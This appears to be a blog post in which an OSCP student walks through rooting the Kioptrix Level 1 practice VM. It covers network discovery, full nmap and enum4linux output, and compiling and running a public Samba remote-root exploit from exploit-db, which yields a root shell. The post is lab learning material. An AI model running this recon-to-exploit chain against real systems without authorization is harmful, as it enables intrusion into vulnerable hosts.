OSCP Journey After Expired Lab Time // Kioptrix Level 1.

Hi all,

I am posting this, because I have decided to journey within the OSCP path to do alternative VMs after my certification LAB TIME has expired.  This is my journey without the ropes. 

Let's do this, y'all. First up, Kioptrix Level 1.  

We do not know strictly the ip address of the machine, so let's try to get root and do a netdiscover 

For beginners, make sure your VmWare Connection (whether it is VirtualBox or VMWare Player / Workstation) to the machine is bridged.

In the term, type netdiscover.

Once you have figured the IP address, which in my case, is 192.168.1.104, you need to start doing some recon on the machine.

In the term, type:

nmap -A -p- -sS 192.168.1.104

As a result, nmap gives me back the following results.

Nmap scan report for 192.168.1.104
Host is up (0.00034s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup:samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)



 MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2019-06-11T05:40:02+00:00; -21d17h24m46s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:A4:04:EF (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -21d17h24m46s, deviation: 0s, median: -21d17h24m46s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.1.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 271.60 seconds

Through enumeration in nmap, I have discovered that Samba runs on this machine.

139/tcp  open  netbios-ssn Samba smbd

After this, I would want to get some juicy information on perhaps, Samba that is running on the system.

I did an enum4linux like this.  I got some important information like this. 

enum4linux 192.168.1.104

======================================== 
| OS information on 192.168.1.104 |
 ======================================== 
[+] Got OS info for 192.168.1.104 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for 192.168.1.104 from srvinfo:
 KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
 platform_id : 500
 os version : 4.5
 server type : 0x9a03

Now, that I know that the SMB version is 2.2.1a, I can find an exploit for it on the open web.

I used the site, https://www.exploit-db.com/exploits/10 and found a RCE exploit for the box.

I had to compile it by typing in:

gcc 10.c -o kiop1exploit

Then, run it through ./kiop1exploit -b 0 -p 139 192.168.1.104

samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
ls
whoami
root

Finally, then, get r00t on the machine! :)   Yay, I did it.  First b0x.

"Yippee Kai Yay mfz".  -- Bruce Willis

Die Hard Yippe Ki Yay Motherfucker GIF from Diehard GIFs